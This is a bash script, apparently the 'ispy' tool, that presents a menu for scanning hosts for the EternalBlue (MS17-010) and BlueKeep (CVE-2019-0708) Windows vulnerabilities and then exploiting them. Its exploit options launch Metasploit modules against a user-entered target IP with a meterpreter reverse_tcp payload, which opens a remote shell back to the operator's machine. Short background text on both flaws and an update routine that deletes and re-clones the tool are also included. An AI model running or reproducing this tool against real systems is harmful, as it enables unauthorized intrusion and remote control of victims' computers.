#!/bin/bash
#Colors
white="\033[1;37m"
grey="\033[0;37m"
purple="\033[0;35m"
red="\033[1;31m"
green="\033[1;32m"
yellow="\033[1;33m"
Cyan="\033[0;36m"
Cafe="\033[0;33m"
Fiuscha="\033[0;35m"
blue="\033[1;34m"
nc="\e[0m"
#vars
n1="1"
n2="2"
n3="3"
n4="4"
n5="5"
n6="6"
n7="7"
n8="8"
b="bluekeep"
e="eternalblue"
r="RDP"
y="Y"
n="n"
pack1="win7/winserver2008 x64"
pack2="winVista/winXP/win2000/winserver2003"
pack3="win8/win8.1/win10/winserver2012 x64"
shell="$:"
en="Enter"
loc_ip=$(ip addr show wlan0 | awk '/inet / {print $2}' | cut -d/ -f 1)
#STARTUP
function banner(){

	echo -e "		$Cyan.___    ________________________.___."
	echo "		|   |  /   _____/\______   \__  |   |"
	echo "		|   |  \_____  \  |     ___//   |   |"
	echo "		|   |  /        \ |    |    \____   |"
	echo "		|___| /_______  / |____|    / ______|"
	echo "		              \/            \/"
	echo -e "$green			Programmed By$red Cyborg$nc\n"
}

exp(){
echo -e "$white[$green$n1$white] use $yellow($green$pack1$yellow:$red$e$yellow)"
echo -e "$white[$green$n2$white] use $yellow($green$pack2$yellow:$red$e$yellow)"
echo -e "$white[$green$n3$white] use $yellow($green$pack3$yellow:$red$e$yellow)"
echo -e "$white[$green$n4$white] use $yellow($green$r$yellow:$blue$b$yellow)"
echo -e "$white[$green$n5$white] Back to main menu"

}

function info_b(){
echo -e "$blue
BlueKeep $green(CVE-2019-0708)$white is a security vulnerability that was discovered in Microsoft's Remote Desktop Protocol, which allows for the possibility of remote code execution.$blue
Bluekeep$nc or$green CVE-2019-0708$white is an$green RCE$white exploit that effects the following versions of Windows systems$green:$nc
$white+$Cyan Windows 2003$nc
$white+$Cyan Windows XP$nc
$white+$Cyan Windows Vista$nc
$white+$Cyan Windows 7$nc
$white+$Cyan Windows Server 2008$nc
$white+$Cyan Windows Server 2008 R2$nc
"
back
}

function info_e(){
echo -e "$red
EternalBlue$white is a$blue cyberattack exploit$white developed by the U.S. National Security Agency$red (NSA)$white according to testimony by former$red NSA$white employees.
It was leaked by$green the Shadow Brokers hacker group$white on$red April 14$white,$red 2017$white, one month after Microsoft released patches for the vulnerability.$red
EternalBlue$white is the name given to a software vulnerability in Microsoft's Windows operating system.
The tech giant has called it$red EternalBlue$blue MS17-010$white and issued a$red security update$white for the flaw on$red March 14$white.
The patch was issued before the$red WannaCry ransomware$white spread around the world and those who had updated early would have been protected. 
The vulnerability works by$red exploiting$blue the Microsoft Server Message Block 1.0$white.
The$blue SMB$white is a$red network file sharing protocol$white and$green 'allows applications on a computer to read and write to files and to request services'$white
that are on the same network.
Microsoft says the$blue security update$white it issued is$red Critical$white and following$red WannaCry$white it released a rare Windows XP patch after officially ending support for the software in$red 2014$white.
$e or$blue MS17-010$white effects the following versions of Windows systems$green:$nc
$white+$Cyan Windows Vista$nc
$white+$Cyan Windows Server 2008$nc
$white+$Cyan Windows 7$nc
$white+$Cyan Windows Server 2008 R2$nc
$white+$Cyan Windows 8.1$nc
$white+$Cyan Windows Server 2012 $nc
$white+$Cyan Windows Server 2012 R2$nc
$white+$Cyan Windows RT 8.1$nc
$white+$Cyan Windows 10$nc
$white+$Cyan Windows Server 2016$nc

"
back
}

function info_me(){
	echo -e "\n$green GitHub profile $green:$white https://github.com/Cyb0r9$nc"
	echo -e "$red YouTbue channel$green:$white https://youtube.com/c/Cyborg_TN$nc"
	echo -e "$purple Ask Fm (ask me)$green:$white https://ask.fm/Cyborg_TN$nc"
	echo -e "$blue E-mail address$green :$white TunisianEagles@protonmail.com$nc"

back
	
}

function update(){
echo -e "$white[$green+$white]$blue Current ispy version is$white :$red"
curl -s "https://raw.githubusercontent.com/Cyb0r9/ispy/master/version.txt"| grep 1.0
if [[ $? = 0 ]]; then
echo -e "$white[$green+$white]$blue ispy already updated$nc"
else
echo -e "$red $(cat version.txt)"
echo -e "$white[$green!$white]$blue Updating ispy ..."
rm -rf ../ispy/
git clone https://github.com/Cyb0r9/ispy.git
fi
back
}

function back(){
	echo ""
	read -p "$(echo -e $red back to main menu $white[$green$y$white/$green$n$white]$red : $nc)" q
		if [[ $q == 'y' ]] || [[ $q == 'Y' ]]
		then
	echo ""
	main
		else
	echo -e "\n$white[$green!$white] quitting the program$nc"
		exit 1
		fi

	}

function main(){
echo -e "$white[$green$n1$white] Scan IP $yellow($red$e$yellow/$blue$b$yellow)$nc"
echo -e "$white[$green$n2$white] exploit"
echo -e "$white[$green$n3$white] info"
echo -e "$white[$green$n4$white] update"
echo -e "$white[$green$n5$white] exit\n"

read -p "$(echo -e $red$shell $nc)" ch

if [[ $ch == "1" ]]; then

echo -e "\n$white[$green$n1$white] $e$nc"
echo -e "$white[$green$n2$white] $b$nc"
echo -e "$white[$green$n3$white] Back to main menu $nc\n"

read -p "$(echo -e $red$shell $nc)" ch1

if [[ $ch1 == "1" ]]; then
echo ""
read -p "$(echo -e $white$en$green ip$white addr$green : $nc)" ip
python scanners/eternalblue_scanner.py $ip
back
elif [[ $ch1 == "2" ]]; then
echo ""
read -p "$(echo -e $white$en$green ip$white addr$green : $nc)" ipv4
python scanners/bluekeep_scanner.py --host $ipv4
back
elif [[ $ch1 == "3" ]]; then
clear
banner
main
else
echo -e "$white[$green!$white] invalid option.$nc"
fi
elif [[ $ch == "2" ]]; then
echo -e "\n "
exp
echo -e "\n"
read -p "$(echo -e $red$shell $nc)" ch2
if [[ $ch2 == "1" ]]; then
echo ""
read -p "$(echo -e $white$en Target$green ip$white : $nc)" t1
msfconsole -q -x " use exploit/windows/smb/ms17_010_eternalblue;
set payload windows/x64/meterpreter/reverse_tcp;
set lhost $loc_ip;
set rhost $t1;
exploit; "
elif [[ $ch2 == "2" ]]; then
echo ""
read -p "$(echo -e $white$en Target$green ip$white : $nc)" t2
msfconsole -q -x " use exploit/windows/smb/ms17_010_psexec;
set payload windows/x64/meterpreter/reverse_tcp;
set lhost $loc_ip;
set rhost $t2;
exploit ;"
elif [[ $ch2 == "3" ]]; then
echo ""
read -p "$(echo -e $white$en Target$green ip$white : $nc)" t3
msfconsole -q -x " use exploit/windows/smb/ms17_010_eternalblue_win8;
set payload windows/x64/meterpreter/reverse_tcp;
set lhost $loc_ip;
set rhost $t3;
exploit ;"
elif [[ $ch2 == "4" ]]; then
echo ""
read -p "$(echo -e $white$en Target$green ip$white : $nc)" t4
msfconsole -q -x " use windows/rdp/cve_2019_0708_bluekeep_rce;
set payload windows/x64/meterpreter/reverse_tcp;
set lhost $loc_ip;
set rhost $t4;
set groomsize 50;
set target 1;
exploit	;"
elif [[ $ch2 == "5" ]]; then
clear
banner
main
else
echo -e "$white[$green!$white] Invalid Option.$nc"
fi # of ch2
elif [[ $ch == "3" ]]; then
echo -e "\n$white[$green$n1$white]$red $e$nc"
echo -e "$white[$green$n2$white]$blue $b$nc"
echo -e "$white[$green$n3$white]$green Me$nc"
echo -e "$white[$green$n4$white] Back to main menu $nc\n"

read -p "$(echo -e $red$shell $nc)" ch3

if [[ $ch3 == "1" ]]; then
info_e
elif [[ $ch3 == "2" ]]; then
info_b
elif [[ $ch3 == "3" ]]; then
info_me
elif [[ $ch3 == "4" ]]; then
clear
banner
main
else
echo -e "$white[$green!$white] Invalid Option.$nc"
fi

elif [[ $ch == "4" ]]; then
update
elif [[ $ch == "5" ]]; then
echo -e "$white[$green!$white] Quitting the program.$nc"
else
echo -e "$white[$green!$white] invalid option.$nc"
fi

}
clear
banner
main
